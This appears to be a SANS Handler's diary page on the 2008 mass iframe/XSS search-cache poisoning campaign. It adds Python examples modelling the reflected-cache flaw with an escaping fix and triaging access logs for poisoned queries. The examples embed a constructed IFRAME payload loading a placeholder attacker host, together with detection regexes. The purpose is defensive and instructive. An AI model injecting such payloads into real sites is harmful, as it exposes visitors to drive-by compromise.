The Other iframe attack
A lot of readers are sending in this link from Dancho Danchev's fabulous blog thinking it's linked to the 2117966.net campaign: http://ddanchev.blogspot.com/2008/03/more-cnet-sites-under-iframe-attack.html
We're also getting this sent in from McAfee's Avert Labs blog: http://www.avertlabs.com/research/blog/index.php/2008/03/13/follow-up-to-yesterdays-mass-hack-attack/
The 2117966.net campaign affected approximately 13,800 ASP pages. No PHP pages.
This other attack is reported to have affected around 200,000 phpBB pages.
It's a bigger attack and very important; read Dancho's blog, which lists IP addresses and domains to look for in your logs as well as the traffic an infected system will generate.
If you're a website administrator, also take a close read of his 04-MAR-2008 entry: http://ddanchev.blogspot.com/2008/03/zdnet-asia-and-torrentreactor-iframe-ed.html
Pay particular attention to how they're inserting the code into the site (from Dancho's Blog):
"(The sites) themselves aren't compromised, their SEO practices of locally caching any search queries submitted are abused. Basically, whenever the malicious attacker is feeding the search engine with popular queries, the sites are caching the search results, so when the malicious party is also searching for the IFRAME in a 'loadable state' next to the keyword, it loads. Therefore, relying on the high page ranks of both sites, the probability to have the cached pages with the popular key words easy to find on the major search engines, with the now 'creative' combination of the embedded IFRAME, becomes a reality if you even take a modest sample, mostly names."
This is important. It's not obvious to me how to fix the problem-- I'm hoping that someone can explain this better.
The writeup at Finjan is more readable to me: http://www.finjan.com/MCRCblog.aspx?EntryId=1905
So we have massive XSS exploitation at work here.
Update: added finjan link that identifies the compromise vector as XSS
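To make the mechanism in Dancho's description concrete, here is an added example (not code from the diary, from Dancho's blog, or from any affected site) that models a search page which renders the submitted query into HTML and caches the rendered page per query string. The payload, the domain malicious.example and the search-page layout are constructed placeholders, not artifacts from the real campaign. The vulnerable variant reflects the query unescaped, so the first requester's IFRAME is baked into the cached page and served to every later visitor (or crawler) who hits the same URL; the hardened variant HTML-escapes the query before it reaches the page, so the same cached entry contains only inert text.

```python
import html
import re

# Constructed attacker query: a popular name with an IFRAME appended.
# The domain is a placeholder, not one from the real campaign.
PAYLOAD = ('britney spears '
           '<iframe src="http://malicious.example/in.cgi" width=0 height=0></iframe>')

# Matches a real tag start; will not match the escaped text "&lt;iframe".
IFRAME_RE = re.compile(r"<iframe\b", re.IGNORECASE)


class SearchSite:
    """Toy model of a site that renders search results into HTML and caches
    the rendered page keyed on the raw query string (the behaviour abused)."""

    def __init__(self, escape_output: bool):
        self.escape_output = escape_output
        self.cache: dict[str, str] = {}
        self.render_count = 0  # how often the page was actually built

    def _render(self, query: str) -> str:
        self.render_count += 1
        # Vulnerable: the raw query lands in the markup.
        # Hardened: every HTML metacharacter is escaped first.
        shown = html.escape(query, quote=True) if self.escape_output else query
        return f"<h1>Results for: {shown}</h1>\n<p>No results found.</p>"

    def search(self, query: str) -> str:
        # Whatever the first requester submitted is what every later
        # requester of the same string receives, straight from cache.
        page = self.cache.get(query)
        if page is None:
            page = self._render(query)
            self.cache[query] = page
        return page


def page_has_live_iframe(page: str) -> bool:
    """True if the page contains an actual <iframe> tag rather than escaped text."""
    return IFRAME_RE.search(page) is not None


def demo(escape_output: bool) -> tuple[bool, int]:
    """Seed the cache as the attacker, then fetch as a later visitor.

    Returns (visitor sees a live iframe?, number of renders performed)."""
    site = SearchSite(escape_output)
    site.search(PAYLOAD)          # attacker seeds the cache
    page = site.search(PAYLOAD)   # later visitor or crawler hits the cached URL
    return page_has_live_iframe(page), site.render_count


if __name__ == "__main__":
    print("vulnerable:", demo(escape_output=False))  # (True, 1)
    print("hardened:  ", demo(escape_output=True))   # (False, 1)
```

Escaping on output closes the reflection; whether a site should cache (and expose to crawlers) arbitrary query strings that nobody but the submitter ever searched for is a separate design question, and is the part of the amplification that escaping alone does not address.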
Making Intelligence Actionable
As demonstrated in the recent iframe attacks, a lot of people knew that something was going on. The challenge is how to collect all of that information and present it in a way that the community finds useful.
The first step in making information useful is to identify your target audience. For today’s example our target audience is going to be system and network administrators (since this is for SANS, that makes a logical choice; other potential target audiences would be IT management or security researchers).
Now that the audience is defined, it’s time to collect the questions they really need answered when there is an ongoing malware campaign. What do network and system administrators need to know?
- How to block the attack—avoiding trouble is always preferred, and stopping the bleeding should be one of the early steps.
- What the attack attempt looks like—malicious domains, IDS signatures, etc.
- What it exploits—what vulnerability does it exploit? Is it a social-engineering attack?
- What a successful attack looks like—some environments may see hundreds of attack attempts; how do they know whether they have hundreds of victims to clean up or hundreds of near-misses?
- Is AV effective? If so, when was it effective?
- Purpose of the attack—this is helpful for prioritizing the response
- How to protect the browsing community from compromise
- How to protect the server community from amplifying the attack
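As an added example of the "what the attempt looks like" and "attempts versus victims" questions above, applied to the search-cache poisoning described in the previous entry: this is not code from the diary or from any referenced blog. It walks Apache combined-format access logs, flags search requests whose query parameter carries an IFRAME, and for each poisoned query string separates the first requester (the client that seeded the cache) from later clients who were served the same poisoned entry, noting how many arrived via a search-engine referer and which host the IFRAME points at (for a blocklist). The log lines, IPs, the search parameter name q and the domain malicious.example are constructed; the list of search-engine referer hosts is an assumption. Later visitors counted here were exposed, not confirmed compromised; confirming compromise needs client-side evidence.

```python
import re
from collections import OrderedDict
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format lines. IPs are documentation ranges and
# the IFRAME domain is a placeholder; none of this comes from a real campaign.
SAMPLE_LOG = """\
203.0.113.5 - - [13/Mar/2008:10:01:02 +0000] "GET /search.php?q=britney+spears+%3Ciframe+src%3D%22http%3A%2F%2Fmalicious.example%2Fin.cgi%22%3E%3C%2Fiframe%3E HTTP/1.1" 200 2311 "-" "Mozilla/4.0"
203.0.113.5 - - [13/Mar/2008:10:01:03 +0000] "GET /search.php?q=angelina+jolie+%3CIFRAME+src%3D%22http%3A%2F%2Fmalicious.example%2Fin.cgi%22%3E%3C%2FIFRAME%3E HTTP/1.1" 200 2290 "-" "Mozilla/4.0"
198.51.100.7 - - [13/Mar/2008:11:15:44 +0000] "GET /search.php?q=britney+spears HTTP/1.1" 200 4012 "-" "Mozilla/5.0"
198.51.100.9 - - [13/Mar/2008:11:20:10 +0000] "GET /search.php?q=britney+spears+%3Ciframe+src%3D%22http%3A%2F%2Fmalicious.example%2Fin.cgi%22%3E%3C%2Fiframe%3E HTTP/1.1" 200 2311 "http://www.google.com/search?q=britney+spears" "Mozilla/5.0"
198.51.100.12 - - [13/Mar/2008:11:22:31 +0000] "GET /search.php?q=britney+spears+%3Ciframe+src%3D%22http%3A%2F%2Fmalicious.example%2Fin.cgi%22%3E%3C%2Fiframe%3E HTTP/1.1" 200 2311 "http://www.google.com/search?q=britney+spears" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
IFRAME_RE = re.compile(r"<iframe\b", re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*["']?(https?://[^"'\s>]+)""", re.IGNORECASE)
# Assumption: referers from these hosts mean the visitor came from a search result.
SEARCH_ENGINE_HOSTS = ("google.", "yahoo.", "live.com", "msn.com")


def parse_line(line: str):
    """Parse one combined-format line; returns None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs URL-decodes, so %3Ciframe becomes a literal "<iframe".
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def triage(log_text: str, search_param: str = "q") -> "OrderedDict[str, dict]":
    """Group poisoned search requests by decoded query string.

    For each poisoned string: who seeded it first, how many hits it took,
    which later clients were served it, how many came from a search engine,
    and which hosts the embedded IFRAME(s) load from."""
    findings: "OrderedDict[str, dict]" = OrderedDict()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for term in rec["query"].get(search_param, []):
            if not IFRAME_RE.search(term):
                continue  # ordinary search, not an attempt
            f = findings.setdefault(term, {
                "first_seen_ip": rec["ip"], "first_seen": rec["ts"], "hits": 0,
                "later_ips": [], "via_search_engine": 0, "iframe_hosts": set(),
            })
            f["hits"] += 1
            if rec["ip"] != f["first_seen_ip"] and rec["ip"] not in f["later_ips"]:
                f["later_ips"].append(rec["ip"])  # served the poisoned entry
            ref_host = urlsplit(rec["referer"]).hostname or ""
            if any(h in ref_host for h in SEARCH_ENGINE_HOSTS):
                f["via_search_engine"] += 1
            for src in SRC_RE.findall(term):
                host = urlsplit(src).hostname
                if host:
                    f["iframe_hosts"].add(host)
    return findings


if __name__ == "__main__":
    for term, f in triage(SAMPLE_LOG).items():
        print(f"{term!r}\n  seeded by {f['first_seen_ip']} at {f['first_seen']}; "
              f"{f['hits']} hits; exposed clients {f['later_ips']}; "
              f"{f['via_search_engine']} via search engine; "
              f"iframe hosts {sorted(f['iframe_hosts'])}")
```

The "first seen" client is only a heuristic for the seeder: log rotation or a cache that outlives the logs can hide the true first request, and a referer is attacker-controllable, so treat via_search_engine as a hint rather than proof. The iframe_hosts set is the part worth feeding straight into proxy and DNS blocks.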
I hope to keep these questions in mind when writing up alerts for the Handler’s diary. Once I have Actionable as a repeatable process, I’ll work more on Timely.